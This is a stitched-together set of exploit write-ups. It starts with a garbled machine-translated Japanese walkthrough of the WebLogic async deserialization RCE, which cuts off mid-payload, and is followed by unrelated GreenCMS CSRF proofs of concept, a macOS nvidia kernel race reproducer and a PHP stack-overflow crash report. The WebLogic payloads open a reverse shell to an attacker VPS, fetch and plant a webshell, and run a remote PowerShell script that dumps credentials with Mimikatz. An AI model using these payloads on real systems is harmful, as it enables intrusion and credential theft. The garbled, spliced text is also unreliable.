2019年4月17日、National Information Securityの脆弱性共有プラットフォーム(CNVD)には、Oracle Weblogic async Deserialization Remot Command実行脆弱性(CNVD-C-2019-48814)が含まれていました。現在、公式のパッチはリリースされておらず、脆弱性の詳細は明らかにされていません。この脆弱性に関するCNVDの包括的な評価は「高リスク」です
0x01脆弱性分析
WebLogic Serverは、米国のOracleが開発したクラウドおよび従来の環境向けのアプリケーションサービスミドルウェアです。開発から生産までのアプリケーションのライフサイクル管理全体をサポートし、アプリケーションの展開と管理を簡素化する最新の軽量開発プラットフォームを提供します。
WEBLOGICの一部のバージョンにデフォルトで含まれるWLS9_ASYNC_RESPONSEパッケージは、WeBlogicサーバーに非同期通信サービスを提供します。 WARパケットには入力情報の脱毛に欠陥があるため、攻撃者は慎重に構築された悪意のあるHTTP要求を送信し、ターゲットサーバーにアクセス許可を取得し、許可なしにコマンドをリモートで実行できます。
CNVDの脆弱性の包括的な評価は「高リスク」です。
0x02脆弱性の説明
最近、インターネットは、weblogicwls9-asyncでリモートコマンドの実行をゆるくする脆弱性を暴露しました。攻撃者は、この脆弱性を悪用して、許可なしにコマンドをリモートで実行します。脆弱性のリスクレベルは高いです。現在、公式のパッチはリリースされておらず、脆弱性の詳細は明らかにされていません。
0x02脆弱性インパクトスコープ
1。影響製品の影響:
Oracle Weblogic Server10.3.6.0.0
Oracle Weblogic Server12.1.3.0.0
Oracle Weblogic Server12.2.1.1.0
Oracle Weblogic Server12.2.1.2.0
2。影響コンポーネントへの影響:
bea_wls9_async_response.war
wsat.war
0x03脆弱性の再発
1。Liunxの下での環境構築
攻撃航空機:KALI2019
脆弱性ターゲットマシン:ubuntu16.04(docker vulhub)weblogic10.3.6(wls1036_generic.jar)
1. Ubuntu 16.04にDockerとDocker-Composeをインストールする:
(1)。 PIPをインストールします
curl -s https://bootstrap.pypa.io/get-pip.py | Python3
(2)。 Dockerをインストールします
curl -s https://get.docker.com/| sh
(3)。 Dockerサービスを開始します
Service Docker Start
(4)。 Docker Composeをインストールします
PIPインストールDocker-Compose
2。使い方
(1)。脆弱性環境プロジェクトのダウンロード
git clone 3https://github.com/vulhub/vulhub.git
(2)。 Nexus利用環境に入ります
CD vulhub/weblogic/cve-2017-10271
(3)。次のコマンドを実行して、Weblogicサービスを開始します
docker -compose up -d
しばらく待って、http://Your-IP:7001にアクセスすると、404ページが表示され、Weblogicが正常に開始されたことを示します。
3.検出方法パスhttp://IP:port/_async/asyncreSponsServiceにアクセスすることにより、ユーザーはコンポーネントを有効にするかどうかを判断できます。次のページに戻ると、このコンポーネントが有効になります。タイムリーに保護対策を講じてください
URL(http://IP:ポート/_async/)を開くと、エラー403をプロンプトし、「RFC 2068 HyperText Transfer Protocol-HTTP/1.13360から」を含み、Oracle Oracle Oracle Oracle Oracle Oracle Oracle Oracle Oracle wlogic WLS9-Async Deserialialize deserialize desirialize command decution bulnerabilityがあります。
http://149.248.54.8233607001/_async/
http://149.248.54.8233607001/_ASYNC/ASYNCRESPONSESSESSERSESSESSESSESSESSESSESSESSEST
2。Linuxの下での脆弱性の搾取
1。リバウンドシェル利用:
(1)。攻撃マシンホストのIPアドレスは次のとおりであり、NCを使用してリバウンドポートを監視します
(2)。次の図に示すように、Burpsuitを介して攻撃パケットをWeblogicサービスに送信します
post/_async/asyncreSponseservice http/1.1
host: IP:port
Content-Length: 853
Accept-Encoding: gzip、deflate
soapaction:
Accept: */*
user-agent: apache-httpclient/4.1.1(java 1.5)
Connection: Keep-Alive
Content-Type:テキスト/XML
soapenv:envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsa='http://www.w3.w3.org/2005/08/addressing' xmlns:asy='http://www.bea.com/async/asyncresponseservice'
soapenv3360header
WSA:ACTIONXX/WSA:ACTION
WSA:RELATESTOXX/WSA3360RELATESTO
work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'
void class='java.lang.processbuilder'
array class='java.lang.string' length='3'
void index='0'
文字列/bin/bash/string
/空所
void index='1'
文字列-C/文字列
/空所
void index='2'
stringbash -i gt; amp; /dev/tcp/vpsip/vpsport 0gt; amp; 1/string
/空所
/配列
void method='start' //void
/work:workcontext
/soapenv3360header
soapenv3360body
ASY:ONASYNCDELIVILION/
/soapenv:body/soapenv:envelope 
(3)。シェルのリバウンドが成功するのを見ることができます
2。WebShellをアップロードします
(1)。 Kali攻撃マシンにシンプルなWebサーバーを構築してから、Webshll.txtをその下に配置できます。
(2)次のPOCを使用して送信攻撃を実行します
POC1:
post/_async/asyncreSponseservice http/1.1
host: IP:port
Content-Length: 789
Accept-Encoding: gzip、deflate
soapaction:
Accept: */*
user-agent: apache-httpclient/4.1.1(java 1.5)
Connection: Keep-Alive
Content-Type:テキスト/XML
soapenv:envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsa='http://www.w3.w3.org/2005/08/addressing' xmlns:asy='http://www.bea.com/async/asyncresponseservice'
soapenv3360header
WSA:ACTIONXX/WSA:ACTION
WSA:RELATESTOXX/WSA3360RELATESTO
work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'
void class='java.lang.processbuilder'
array class='java.lang.string' length='3'
void index='0'
文字列/bin/bash/string
/空所
void index='1'
文字列-C/文字列
/空所
void index='2'
StringWget http://VPSIP:VPSPORT/webShell.txt -oサーバー/adminserver/tmp/_wl_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp/string
/空所
/配列
void method='start' //void
/work:workcontext
/soapenv3360header
soapenv3360body
ASY:ONASYNCDELIVILION/
/soapenv3360body/soapenv:envelope
POC2:
post/_async/asyncreSponseservice http/1.1
host: IP:port
Content-Length: 789
Accept-Encoding: gzip、deflate
soapaction:
Accept: */*
user-agent: apache-httpclient/4.1.1(java 1.5)
Connection: Keep-Alive
Content-Type:テキスト/XML
soapenv:envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsa='http://www.w3.w3.org/2005/08/addressing' xmlns:asy='http://www.bea.com/async/asyncresponseservice'
soapenv3360header
WSA:ACTIONXX/WSA:ACTION
WSA:RELATESTOXX/WSA3360RELATESTO
work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'
void class='java.lang.processbuilder'
array class='java.lang.string' length='3'
void index='0'
文字列/bin/bash/string
/空所
void index='1'
文字列-C/文字列
/空所
void index='2'
StringCurl http://VPSIP:VPSPORT/webShell.txt -oサーバー/adminserver/tmp/_wl_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp/string
/空所
/配列
void method='start' //void
/work:workcontext
/soapenv3360header
soapenv3360body
ASY:ONASYNCDELIVILION/
/soapenv3360body/soapenv:envelope
(3)。 WebShellにアクセスします
http://149.248.54.82:7001/_async/test.jsp
3。窓の下の環境構造
1.Weblogic12.1.3.0.0インストール
住所をダウンロード:https://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
インストールを開始:( Java環境サポートが必要です。Java環境変数の構成を忘れないでください)
次のインストールパッケージのいずれかを選択して、ここで12.1.3.0を選択しました
2。実行するためにCMDを開きます:
c: \プログラムファイル\ java \ jdk1.8.0_152 \ bin \ java -jar c: \ fmw_12.1.3.0.0_wls.jar
c: \ program files \ java \ jdk1.8.0_121 \ bin \ directoryでjava.exeを使用して、weblogic12c jarパッケージを実行します(デフォルトの順序が使用されます。ファイル\ java \ jdk1.8.0_121 \ jre \ bin \が使用されるため、パッケージJREは有効なJDKではありません)。したがって、CMDでは、C: \プログラムファイル\ java \ jdk1.8.0_152 \ bin \ java -jar c: \ fmw_12.1.3.0.0.0.0.0_Wls.jar(プログラムを使用する理由〜1を使用する必要があります。
3。しばらく待つと、インストーラーがポップアップします。
4。構成が完了したら、startweblogic.cmdを見つけてダブルクリックしてweblodgicを開始します。
5.アクセスhttp://127.0.0.1:7001/コンソール検証
4。Windowsの下での脆弱性の悪用:
1.アドレスを開きhttp://IP:port/_async/asyncreSponseseviceが脆弱性があるかどうかを確認する
2。シェルをリバウンドするには、CobaltStrikeを直接使用してPayload.ps1 PowerShellスクリプトを生成し、スクリプトをパブリックネットワークに配置し、次のPOCを使用して送信できます。
post/_async/asyncreSponseservice http/1.1
host: IP:port
Content-Length: 861
Accept-Encoding: gzip、deflate
soapaction:
Accept: */*
user-agent: apache-httpclient/4.1.1(java 1.5)
Connection: Keep-Alive
Content-Type:テキスト/XML
soapenv:envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsa='http://www.w3.w3.org/2005/08/addressing' xmlns:asy='http://www.bea.com/async/asyncresponseservice'
soapenv3360header
WSA:ACTIONXX/WSA:ACTION
WSA:RELATESTOXX/WSA3360RELATESTO
work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'
void class='java.lang.processbuilder'
array class='java.lang.string' length='3'
void index='0'
stringcmd/string
/空所
void index='1'
文字列/c/文字列
/空所
void index='2'
StringPowerShell 'IEX(new-Object net.WebClient).DownLoadString(' http://IP:port/payload.ps1 '); Invoke -Mimikatz -Dumpcreds '/文字列
/空所
/配列
void method='start' //void
/work:workcontext
/soapenv3360header
soapenv3360body
ASY:ONASYNCDELIVILION/
/soapenv3360body/soapenv:envelope
Cobalstrikeでターゲットシステムを正常に跳ね返すシェルがわかります
3。WebShellをアップロードします
(1)。パブリックホストにwebshell.txtを配置します(ここにKaliホストがあります)
2。次のPOCを使用してリクエストを送信します。
POC1:
post/_async/asyncreSponseservice http/1.1
host: IP:port
Content-Length: 854
Accept-Encoding: gzip、deflate
soapaction:
Accept: */*
user-agent: apache-httpclient/4.1.1(java 1.5)
Connection: Keep-Alive
Content-Type:テキスト/XML
soapenv:envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsa='http://www.w3.w3.org/2005/08/addressing' xmlns:asy='http://www.bea.com/async/asyncresponseservice'
soapenv3360header
WSA:ACTIONXX/WSA:ACTION
WSA:RELATESTOXX/WSA3360RELATESTO
work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'
void class='java.lang.processbuilder'
array class='java.lang.string' length='3'
void index='0'
stringcmd/string
/空所
void index='1'
文字列/c/文字列
/空所
void index='2'
StringPowerShell(new-Object System.net.WebClient).DownLoadFile( 'http://IP3360port/webshell.txt'、 'Servers/adminserver/tmp/_wl_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')/弦
/空所
/配列
void method='start' //void
/work:workcontext
/soapenv3360header
soapenv3360body
ASY:ONASYNCDELIVILION/
/soapenv3360body&lt
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin
# Date: 2018-06-02
# Exploit Author: xichao
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
# Software Link: https://github.com/GreenCMS/GreenCMS
# Version: v2.3.0603
# CVE : CVE-2018-11671
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle.
poc:
<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>csrftest</title>
</head>
<body>
<form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">
<input type="hidden" name="user_id0" value="1">
<input type="hidden" name="user_login" value="test1">
<input type="hidden" name="password" value="test1">
<input type="hidden" name="rpassword" value="test1">
<input type="hidden" name="user_nicename" value="123">
<input type="hidden" name="user_email" value="123%40Qq.com">
<input type="hidden" name="user_url" value="www.baidu.com">
<input type="hidden" name="user_intro" value="test">
<input type="hidden" name="user_status" value="1">
<input type="hidden" name="role_id" value="1">
<button type="submit" value="Submit">add admin</button>
</form>
</body>
</html></span>
References:
http://www.iwantacve.cn/index.php/archives/39/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
https://github.com/GreenCMS/GreenCMS/issues/109
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
# Date: 2018-06-02
# Exploit Author: xichao
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
# Software Link: https://github.com/GreenCMS/GreenCMS
# Version: v2.3.0603
# CVE : CVE-2018-11670
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that
allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
poc:
<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>csrftest</title>
</head>
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
<script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
<input type="hidden" name="cmd" value="put">
<input type="hidden" name="target" value="l1_eGMucGhw">
<input type="hidden" name="content" value="<?php phpinfo();?>">
<button type="submit" value="Submit">WebShell</button>
</form>
</body>
</html></span>
References:
http://www.iwantacve.cn/index.php/archives/38/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
https://github.com/GreenCMS/GreenCMS/issues/108
/*
nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService.
It calls task_deallocate without locking. Two threads can race calling this external method to drop
two task references when only one is held.
Note that the repro forks a child which give the nvAccelerator a different task otherwise
the repro is more likely to leak task references than panic.
*/
// ianbeer
#if 0
MacOS kernel UAF due to lack of locking in nvidia GeForce driver
nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService.
It calls task_deallocate without locking. Two threads can race calling this external method to drop
two task references when only one is held.
Note that the repro forks a child which give the nvAccelerator a different task otherwise
the repro is more likely to leak task references than panic.
#endif
// build: clang -o nvtask nvtask.c -framework IOKit
// run: while true; do ./nvtask; done
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
uint64_t set_app_support_bits(mach_port_t conn) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputStructCnt = 1;
outputStructCnt = 1;
inputStruct[0] = 0xff;
err = IOConnectCallMethod(
conn,
0x107,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
} else{
printf("worked?\n");
}
return 0;
}
volatile int go = 0;
volatile int running = 0;
void* thread_func(void* arg) {
mach_port_t conn = (mach_port_t)arg;
printf("thread running\n");
running = 1;
while(!go){;}
set_app_support_bits(conn);
return 0;
}
int main(int argc, char** argv){
pid_t child_pid = fork();
if (child_pid == -1) {
printf("fork failed\n");
return 0;
}
if (child_pid) {
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator"));
if (service == MACH_PORT_NULL) {
printf("unable to find service\n");
return 0;
}
printf("got service: 0x%x\n", service);
io_connect_t conn = MACH_PORT_NULL;
kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice
if (err != KERN_SUCCESS) {
printf("unable to open ioservice\n");
return 0;
}
printf("got service\n");
pthread_t th;
pthread_create(&th, NULL, thread_func, (void*)conn);
while(!running){;}
go = 1;
set_app_support_bits(conn);
pthread_join(th, NULL);
int loc = 0;
wait(&loc);
} else {
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator"));
if (service == MACH_PORT_NULL) {
printf("unable to find service\n");
return 0;
}
printf("got service: 0x%x\n", service);
io_connect_t conn = MACH_PORT_NULL;
kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice
if (err != KERN_SUCCESS) {
printf("unable to open ioservice\n");
return 0;
}
printf("got service\n");
set_app_support_bits(conn);
}
return 0;
}
Description:
------------
The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:
php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723
if (tmp_line[tmp_line_len - 1] == '\n') {
--tmp_line_len;
if (tmp_line[tmp_line_len - 1] == '\r') {
--tmp_line_len;
}
}
If the proceeding buffer contains '\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.
$ bin/php --version
PHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
Test script:
---------------
$ xxd -g 1 poc
0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..
$ nc -vvlp 8080 < poc
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)
GET / HTTP/1.0
Host: localhost:8080
Connection: close
$ bin/php -r 'file_get_contents("http://localhost:8080");'
Expected result:
----------------
NO CRASH
Actual result:
--------------
$ bin/php -r 'file_get_contents("http://localhost:8080");'
=================================================================
==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac
READ of size 1 at 0xbfc038ef thread T0
#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723
#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979
#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027
#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550
#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224
#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573
#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731
#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760
#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082
#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123
#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134
#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042
#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404
#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)
Address 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:
This frame has 13 object(s):
[32, 36) 'transport_string'
[96, 100) 'errstr'
[160, 164) 'http_header_line_length'
[224, 232) 'timeout'
[288, 296) 'req_buf'
[352, 360) 'tmpstr'
[416, 432) 'ssl_proxy_peer_name'
[480, 496) 'http_header'
[544, 576) 'buf'
[608, 736) 'tmp_line'
[768, 1792) 'location'
[1824, 2848) 'new_path'
[2880, 3904) 'loc_path'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex
Shadow bytes around the buggy address:
0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4
0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4
0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4
0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00
=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00
0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2
0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap righ redzone: fb
Freed Heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==26249== ABORTING
Aborted